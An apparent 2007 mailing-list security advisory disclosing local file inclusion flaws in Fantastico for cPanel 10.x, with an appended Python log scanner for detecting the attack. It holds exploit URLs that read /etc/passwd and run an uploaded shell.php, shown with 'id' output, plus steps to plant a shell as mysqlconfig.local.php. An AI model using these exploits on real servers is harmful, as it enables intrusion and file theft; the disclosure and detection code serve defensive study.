Fantastico In all Version Cpanel 10.x <= local File Include
- To: submit@xxxxxxxxxxx
- Subject: Fantastico In all Version Cpanel 10.x <= local File Include
- From: "z3r0 z3r0.2.z3r0" <z3r0.2.z3r0@xxxxxxxxx>
- Date: Sun, 11 Mar 2007 10:21:53 -0800
- Cc: bugtraq@xxxxxxxxxxxxxxxxx
##############################################################
Fantastico In all Version Cpanel 10.x <= local File Include
##############################################################
Note : The php.ini settings are the cPanel defaults, and they are
the same on all web servers.
You must provide a username and password and log in on :2082
This breaks the strongest protection: mod_security & safe_mode:On &
Disable functions : All NONE
Vulnerable Code ( 1 ) :
// $userlanguage is taken from the request, so the caller chooses the included file
if(is_file($userlanguage))
{
    include ( $userlanguage );
}
In
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php
Exploit 1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php
id
uid=32170(user) gid=32170(user) groups=32170(user)
Exploit 2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd
###################################################
Vulnerable Code ( 2 ) :
// $fantasticopath is taken from the request, so the include path prefix is caller-controlled
$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
{
    include($localmysqlconfig);
}
in
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
and also in many other files of the program
Exploit :
First create a directory named (/includes/)
and upload Shell.php into (/includes/), then rename it to
mysqlconfig.local.php D:
:::xploit::::
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/
###################################################
Discovered By : cyb3rt & 020
###################################################
Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team
###################################################
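
Added example, not part of the original post: a log check for requests that pass a file path in the userlanguage or fantasticopath parameter of a script under /frontend/<theme>/fantastico/, as in the URLs above. The combined access-log format, the sample lines and the function names are assumptions made for this illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the advisory shows reaching include(); matched case-insensitively.
SUSPECT_PARAMS = {"userlanguage", "fantasticopath"}
# Assumption: combined-format access log with a quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any PHP script under the Fantastico frontend directory, for any theme name.
SCRIPT_RE = re.compile(r"/frontend/[^/]+/fantastico/.*\.php$", re.I)

# Constructed sample lines (documentation IPs, values taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - user [11/Mar/2007:10:21:53 -0800] "GET /frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd HTTP/1.1" 200 1532',
    '192.0.2.10 - user [11/Mar/2007:10:22:10 -0800] "GET /frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=%2Fhome%2Fuser%2F HTTP/1.1" 200 0',
    '192.0.2.44 - bob [11/Mar/2007:10:25:00 -0800] "GET /frontend/x/fantastico/index.php HTTP/1.1" 200 8120',
    '192.0.2.44 - bob [11/Mar/2007:10:26:00 -0800] "GET /frontend/x/files/index.html?userlanguage=/etc/passwd HTTP/1.1" 200 10',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so %252F and %2F both compare as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return [(param, decoded_value)] where a request supplies an include path."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not SCRIPT_RE.search(fully_decode(url.path)):
        return []
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(value)
        # Heuristic: a path separator or ".." means the client chose the file.
        if name.lower() in SUSPECT_PARAMS and re.search(r"[/\\]|\.\.", value):
            hits.append((name.lower(), value))
    return hits

if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOG, 1):
        for param, value in suspicious_params(line):
            print(f"line {number}: {param} -> {value}")
```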